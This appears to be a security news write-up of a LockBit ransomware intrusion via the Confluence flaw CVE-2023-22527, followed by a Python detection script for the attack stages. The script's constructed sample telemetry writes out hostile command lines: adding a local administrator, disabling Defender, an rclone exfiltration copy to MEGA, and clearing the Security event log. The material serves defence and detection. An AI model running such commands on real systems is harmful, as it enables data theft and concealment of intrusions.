In a swift and highly coordinated attack, LockBit ransomware operators exploited CVE-2023-22527, a critical remote code execution vulnerability in Atlassian Confluence Data Center and Server, on an internet-exposed Windows server.
The vulnerability, rated CVSS 10.0, is a template injection flaw: an unauthenticated attacker can inject Object-Graph Navigation Language (OGNL) expressions through an exposed Velocity template endpoint and have them evaluated on the server, which yields arbitrary command execution.
The attack commenced with system discovery commands, such as net user and whoami, to enumerate user accounts and gather system details.
The attackers leveraged this initial foothold to deploy AnyDesk for persistent access and used the Metasploit framework to establish command-and-control (C2) channels.
Within minutes, they created a new local administrator account and proceeded to disable security defenses, including Windows Defender.
Using Remote Desktop Protocol (RDP), the attackers moved laterally across the network, targeting key systems such as backup servers and file shares.
According to the DFIR Report, they employed tools like Mimikatz to extract credentials and SoftPerfect’s NetScan for network enumeration.
On the backup server, they ran PowerShell scripts to retrieve stored Veeam credentials and used those compromised accounts to access additional systems.
Data exfiltration began just over an hour into the intrusion. The attackers used Rclone, a legitimate cloud storage tool, to transfer sensitive files to MEGA.io.
To cover their tracks, they cleared Windows event logs and deleted files associated with their operations.
Approximately two hours after initial access, the attackers launched the LockBit ransomware payload.
Initially, ransomware binaries were executed manually on specific servers via active RDP sessions.
To ensure widespread encryption, they utilized PDQ Deploy, an enterprise software deployment tool, automating the distribution of ransomware binaries across multiple endpoints via SMB shares.
As a fallback, a second encryption wave was launched against remote systems by mounting their C$ administrative shares and executing the payload over them.
The attack culminated in encrypted files bearing the .rhddiicoE extension and ransom notes left on compromised systems.
The attackers also altered desktop backgrounds as part of their ransomware execution process.
This incident underscores the importance of patching known vulnerabilities promptly and of monitoring for anomalous activity early in the intrusion lifecycle: a web-application service spawning shells, a new local administrator appearing, and security tooling being disabled are all detectable within the first minutes, well before exfiltration and encryption.
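As an added example (not code from the DFIR Report or from this article), the following Python triage rule set maps each stage of the chain described above to a check over process-creation telemetry. Event fields are modelled on Sysmon Event ID 1; every hostname, user, path and command line in the sample data is constructed for the example, and the name of the PDQ Deploy target-side runner process is an assumption. The point of the host ranking is that any single rule (whoami, net user) also fires on legitimate administration, whereas one host tripping several stages in sequence is the signal a SOC should page on.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (fields modelled on Sysmon Event ID 1)."""
    host: str
    user: str
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


# Confluence runs inside Tomcat, so the JVM is the parent of any post-exploitation shell.
WEB_PARENTS = {"java.exe", "tomcat9.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "whoami.exe", "net.exe", "net1.exe"}

# One predicate per stage of the chain; each takes a ProcEvent and returns True on a match.
RULES = {
    # Initial access: the web-application process spawning a shell or discovery tool.
    "web_service_spawns_shell": lambda e: (
        _basename(e.parent_image) in WEB_PARENTS and _basename(e.image) in SHELLS
    ),
    # Discovery: whoami / net user / net localgroup right after exploitation.
    "discovery_command": lambda e: re.search(
        r"\b(whoami|net\s+user|net\s+localgroup)\b", e.command_line, re.I
    ) is not None,
    # Persistence: a new member added to the local Administrators group.
    "local_admin_added": lambda e: (
        _basename(e.image) in {"net.exe", "net1.exe"}
        and re.search(r"\blocalgroup\s+administrators\b.*\s/add\b", e.command_line, re.I) is not None
    ),
    # Defense evasion: Defender real-time protection switched off from PowerShell.
    "defender_disabled": lambda e: re.search(
        r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$?true", e.command_line, re.I
    ) is not None,
    # Exfiltration: Rclone with a MEGA remote on the command line.
    "rclone_exfil_to_mega": lambda e: (
        _basename(e.image) == "rclone.exe" and "mega" in e.command_line.lower()
    ),
    # Anti-forensics: Windows event logs cleared with wevtutil.
    "event_log_cleared": lambda e: (
        _basename(e.image) == "wevtutil.exe"
        and re.search(r"\s(cl|clear-log)\s", e.command_line, re.I) is not None
    ),
    # Impact: any child of the PDQ Deploy target-side runner deserves review when no
    # deployment was scheduled. (The runner's process name is an assumption.)
    "deploy_tool_child_process": lambda e: _basename(e.parent_image).startswith("pdqdeployrunner"),
}


def triage(events):
    """Map each rule name to the [(host, command_line), ...] events that matched it."""
    hits = {name: [] for name in RULES}
    for event in events:
        for name, matches in RULES.items():
            if matches(event):
                hits[name].append((event.host, event.command_line))
    return hits


def rank_hosts(hits):
    """Rank hosts by the number of distinct stages observed on them, most first."""
    stages_per_host = {}
    for name, matches in hits.items():
        for host, _ in matches:
            stages_per_host.setdefault(host, set()).add(name)
    return sorted(
        ((host, len(stages)) for host, stages in stages_per_host.items()),
        key=lambda pair: (-pair[1], pair[0]),
    )


# Constructed sample telemetry mirroring the article's timeline (all values made up).
JAVA = r"C:\Atlassian\Confluence\jre\bin\java.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    ProcEvent("CONF01", "NT AUTHORITY\\SYSTEM", JAVA, CMD, "cmd.exe /c whoami"),
    ProcEvent("CONF01", "NT AUTHORITY\\SYSTEM", JAVA, CMD, "cmd.exe /c net user"),
    ProcEvent("CONF01", "NT AUTHORITY\\SYSTEM", CMD, r"C:\Windows\System32\net.exe",
              "net localgroup administrators backup /add"),
    ProcEvent("CONF01", "CONF01\\backup", CMD,
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"),
    ProcEvent("BACKUP01", "CONF01\\backup", CMD, r"C:\Temp\rclone.exe",
              r"rclone.exe copy D:\Shares\Finance mega:exfil -q --transfers 8"),
    ProcEvent("BACKUP01", "CONF01\\backup", CMD, r"C:\Windows\System32\wevtutil.exe",
              "wevtutil.exe cl Security"),
    ProcEvent("WS042", "NT AUTHORITY\\SYSTEM",
              r"C:\Windows\AdminArsenal\PDQDeployRunner\service-1\exec\PDQDeployRunner-1.exe",
              r"C:\Windows\AdminArsenal\PDQDeployRunner\service-1\exec\update.exe", "update.exe -pass"),
    ProcEvent("WS042", "CORP\\jdoe", r"C:\Windows\explorer.exe", CMD, "cmd.exe /c dir"),  # benign
]

if __name__ == "__main__":
    results = triage(SAMPLE_EVENTS)
    for name, matches in results.items():
        for host, cmd in matches:
            print(f"{name:28s} {host:9s} {cmd}")
    print(rank_hosts(results))
```

Run against the sample set, the Confluence host trips four stages within the first events and surfaces at the top of the ranking, while the workstation's single deploy-runner child and the benign dir command stay at the bottom; in production the same predicates map directly onto Sysmon or EDR process fields.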